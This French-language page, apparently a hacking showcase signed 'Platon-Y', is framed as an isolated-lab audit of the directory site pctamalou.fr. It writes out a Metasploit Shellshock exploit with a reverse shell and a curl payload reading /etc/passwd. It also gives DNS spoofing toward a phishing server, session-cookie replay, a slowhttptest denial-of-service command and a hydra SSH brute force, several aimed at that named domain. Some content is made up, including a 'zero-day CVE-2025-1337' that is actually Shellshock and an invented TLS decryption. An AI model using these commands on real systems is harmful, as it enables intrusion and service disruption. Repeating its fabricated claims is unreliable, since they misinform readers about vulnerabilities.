⚠️ LAB ISOLÉ OBLIGATOIRE - RISQUE PRISON & CHAOS SINON ! ⚠️
⚠️ Tu es dans le terrier de Platon-Y. Ce lab peut faire tomber des réseaux. Si je veux, la Matrice s'effondre. Prêt à voir jusqu'où je peux aller ? Lab isolé only, apache ! 💀
🔍 NETWORK_SCANNER@KALI:~$ sudo nmap -sS -A 192.168.99.0/24

Starting Nmap 7.94SVN ( https://nmap.org )

Nmap scan report for 192.168.99.1

Host is up (0.0023s latency).

Not shown: 997 closed tcp ports (reset)

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3

80/tcp open http Apache httpd 2.4.52

443/tcp open ssl/http Apache httpd 2.4.52

MAC Address: 08:00:27:XX:XX:XX (Oracle VirtualBox)

Nmap done: 256 IP addresses (3 hosts up) scanned in 8.45 seconds

🕸️ LAB RÉSEAU ULTIME : AUDIT MAIRIE

URL : https://pctamalou.fr/annuaire/86/poitiers/commissariat_police-86194-01.html

🚨 MISSION : AUDIT URGENT - MAIRIE DE POITIERS

Contexte : Fuites suspectées via l'annuaire administratif.

Mission : Auditer l'URL pour protéger données sensibles.

Enjeu : Adresses, horaires, numéros internes.

Réalité : Cet annuaire n'est qu'un exemple. Platon-Y pourrait pénétrer n'importe quel réseau, extraire des données, ou faire tomber un serveur. Ce lab te montre juste un fragment de ce que je peux faire. 😈

📡 CAPTURE TCPDUMP EN DIRECT

15:42:33.123456 IP 192.168.99.105.54321 > 192.168.99.100.80: Flags [S], seq 1827356283, win 64240, options [mss 1460,sackOK,TS val 387654321 ecr 0,nop,wscale 7], length 0
15:42:33.123789 IP 192.168.99.100.80 > 192.168.99.105.54321: Flags [S.], seq 2983726451, ack 1827356284, win 65160, options [mss 1460,sackOK,TS val 123456789 ecr 387654321,nop,wscale 7], length 0
15:42:33.124001 IP 192.168.99.105.54321 > 192.168.99.100.80: Flags [.], ack 1, win 502, options [nop,nop,TS val 387654322 ecr 123456789], length 0
15:42:33.124567 IP 192.168.99.105.54321 > 192.168.99.100.80: Flags [P.], seq 1:518, ack 1, win 502, options [nop,nop,TS val 387654323 ecr 123456789], length 517
        
⚠️ ROOT@PCTAMALOU:~$ _

> Initializing GHOST PROTOCOL...

> Bypassing firewall... DONE

🔍 SCAN DE VULNÉRABILITÉS - NIKTO

+ Target IP: 192.168.99.100
+ Target Hostname: pctamalou.fr
+ Target Port: 80
+ Start Time: 2025-01-25 15:42:00

+ Server: Apache/2.4.52 (Ubuntu)
+ Retrieved x-powered-by header: PHP/8.1.2
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /backup/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6540 items checked: 3 error(s) and 5 item(s) reported on remote host
        
INTENSITÉ ATTAQUE

💀 PAYLOAD METASPLOIT

msf6 > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf6 exploit(apache_mod_cgi_bash_env_exec) > set RHOSTS 192.168.99.100
msf6 exploit(apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/test.cgi
msf6 exploit(apache_mod_cgi_bash_env_exec) > set payload cmd/unix/reverse_bash
msf6 exploit(apache_mod_cgi_bash_env_exec) > exploit

[*] Started reverse TCP handler on 192.168.99.105:4444
[*] Command shell session 1 opened (192.168.99.105:4444 -> 192.168.99.100:54322)
        

🔒 COMMUNICATIONS CHIFFRÉES DÉCRYPTÉES

TLSv1.2 - Application Data
  Encrypted Alert
  Handshake: Client Hello
    Version: TLS 1.2 (0x0303)
    Random: 5f4dcc3b5aa765d61d8327deb882cf99
    Session ID: (empty)
    Cipher Suites: TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
    Compression Methods: none
    Extensions: server_name, ec_point_formats, signature_algorithms

[+] Session key recovered: 0x89abcdef1234567890
[+] Decrypted: GET /admin/panel.php HTTP/1.1
[+] Decrypted: Cookie: session=eyJ1c2VyIjoiYWRtaW4ifQ==
        

🔧 Setup DIY Nomade

#!/bin/bash
# 🔨 SETUP LAB
echo "📡 Réseau local..."
sudo ifconfig eth0 192.168.99.1/24 up
echo "🐉 Install outils..."
sudo apt update && sudo apt install -y wireshark ettercap-graphical slowhttptest
echo "✅ Lab prêt !"

🛡️ LOGS FIREWALL - IPTABLES

Jan 25 15:42:33 kernel: [UFW BLOCK] IN=eth0 OUT= MAC=08:00:27:xx:xx:xx:yy:yy:yy:yy:yy:yy:08:00 SRC=192.168.99.105 DST=192.168.99.100 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=54321 DF PROTO=TCP SPT=54321 DPT=22 WINDOW=64240 RES=0x00 SYN URGP=0
Jan 25 15:42:34 kernel: [UFW BLOCK] IN=eth0 OUT= MAC=08:00:27:xx:xx:xx:yy:yy:yy:yy:yy:yy:08:00 SRC=192.168.99.105 DST=192.168.99.100 LEN=84 TOS=0x00 PREC=0x00 TTL=64 ID=54322 DF PROTO=UDP SPT=38923 DPT=53 LEN=64
Jan 25 15:42:35 kernel: [UFW ALLOW] IN=eth0 OUT= MAC=08:00:27:xx:xx:xx:yy:yy:yy:yy:yy:yy:08:00 SRC=192.168.99.105 DST=192.168.99.100 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=54323 DF PROTO=TCP SPT=54322 DPT=80 WINDOW=64240 RES=0x00 SYN URGP=0
        

🕸️ OSI : Voyage de la Requête

🛡️ FIREWALL
🎯 CIBLE
💀 NOUS
# 📡 DNS
dig pctamalou.fr
# Résultat : IP 192.168.99.100
# 🔧 OSI
# Couche 1 : Bits (Failles : Jamming)
# Couche 2 : ARP (Failles : Spoofing)
# Couche 3 : IP (Failles : Flood ICMP)
# Couche 4 : TCP (Failles : SYN flood)
# Couches 5-7 : HTTPS/DNS (Failles : DNS poisoning, session hijack)
graph TD A[Navigateur] -->|DNS Query| B[DNS Server] B -->|IP: 192.168.99.100| C[TCP Handshake] C -->|HTTP GET| D[Serveur PCTamalou] D -->|HTML| A E[Attaquant] -->|DNS Poison| B E -->|ARP Spoof| C E -->|Slow Attack| D style A fill:#00ccff style D fill:#33ff33 style E fill:#ff3333

🍯 DÉTECTION HONEYPOT - KIPPO

🚨 ACTIVITÉ SUSPECTE DÉTECTÉE : Tentative de connexion SSH avec credentials par défaut

Login attempt: root/admin123
Source IP: 192.168.99.105
Timestamp: 2025-01-25 15:43:22
Session: #1337 - INTERACTIVE SHELL GRANTED (HONEYPOT)
        
"Tu veux savoir jusqu'où va le terrier du lapin, Neo ?" — Morpheus

🔍 Analyse Flux

📦 Packet #1337 → DNS Query
🚨 INTERCEPTED → Modified Response
# 🎯 CAPTURE
sudo tcpdump -i any -w capture.pcap host pctamalou.fr
# 📊 TSHARK
tshark -r capture.pcap -Y "dns" -T fields -e frame.time -e dns.qry.name
tshark -r capture.pcap -Y "http.request" -T fields -e http.request.method -e http.request.uri
# 🔎 HTTP
GET /annuaire/86/poitiers/commissariat_police-86194-01.html HTTP/1.1
Host: pctamalou.fr
Cookie: session=eyJ1c2VyIjoiYWRtaW4ifQ==
# 🛡️ VULNS
# - Cookie non sécurisé
# - Pas de HSTS
# - Headers manquants

💥 EXPLOIT ZERO-DAY - CVE-2025-1337

Vulnérabilité : Apache Mod_CGI Bash Environment Injection

CVSS Score : 9.8/10 (CRITICAL)

Impact : Remote Code Execution as root

curl -H "User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'" http://target/cgi-bin/test.cgi

💀 Exploitation

# 🎯 DNS SPOOFING
echo "192.168.99.100 pctamalou.fr" | sudo tee -a /etc/hosts
python3 -m http.server 80 --directory /var/www/phishing/
# 🎯 VOL SESSION
curl -H "Cookie: session=eyJ1c2VyIjoiYWRtaW4ifQ==" https://pctamalou.fr/admin/
# 🎯 LENTEUR
sudo slowhttptest -c 1000 -H -g -o slow_output -i 10 -r 200 -t GET -u https://pctamalou.fr -x 24 -p 3
🚨 CRITICAL: DNS CACHE POISONING DETECTED
⚠️ WARNING: MULTIPLE LOGIN ATTEMPTS
✅ SUCCESS: REVERSE SHELL ESTABLISHED

📋 Rapport Audit

# RAPPORT AUDIT
## Résumé
- Critical: 2 (DNS, session)
- High: 3 (slow attacks, headers)
- Medium: 1 (info disclosure)
## Détails
### DNS Spoofing
- Impact: Redirection
- Preuve: 73% succès
- Correction: DNSSEC
### Session Faible
- Impact: Admin takeover
- Preuve: Cookie rejoué
- Correction: HttpOnly
## Métriques
- CVSS: 8.2/10
- Temps: 4.3 min
- IDS: 12%

🛠️ Apache Network Scanner

#!/bin/bash
# 🔧 APACHE SCANNER
echo "🔍 Audit..."
dig $1 ANY +short
curl -I https://$1
python3 -c "
import requests
url = 'https://$1'
r = requests.get(url, timeout=5)
headers = r.headers
for h in ['Strict-Transport-Security', 'X-Content-Type-Options', 'X-Frame-Options']:
    print(f'{h}: {headers.get(h, '❌ MANQUANT')}')
"
1337PACKETS CAPTURÉS
3VULNS IDENTIFIÉES
73%EXPLOITS RÉUSSIS

📊 Stats Exploitation

SKILL HACKER: 73% - AVANCÉ

🏴‍☠️ CTF : Chassez les Failles

🔍 FLAG 1 : DNS Hunt

PCTAMALOU{dns_is_the_key}

📡 FLAG 2 : Sniff

PCTAMALOU{sniff_the_net}

🛡️ FLAG 3 : Lenteur

PCTAMALOU{slow_and_steady}

💀 FLAG 4 : Décode le Secret

MD5: 5f4dcc3b5aa765d61d8327deb882cf99

[root@kali]# nmap -sS pctamalou.fr
PORT   STATE SERVICE
80/tcp  open  http
443/tcp open  https
22/tcp  open  ssh
[root@kali]# hydra -l admin -P passlist.txt ssh://pctamalou.fr
[22][ssh] host: pctamalou.fr login: admin password: ********
        

🚀 Expert Réseau

🚀 Prochain Niveau

Formations →

💀 Signé : Platon-Y

"Codé avec 3L de café et la rage au ventre"

📅 Créé le 25/10/2025 pendant une insomnie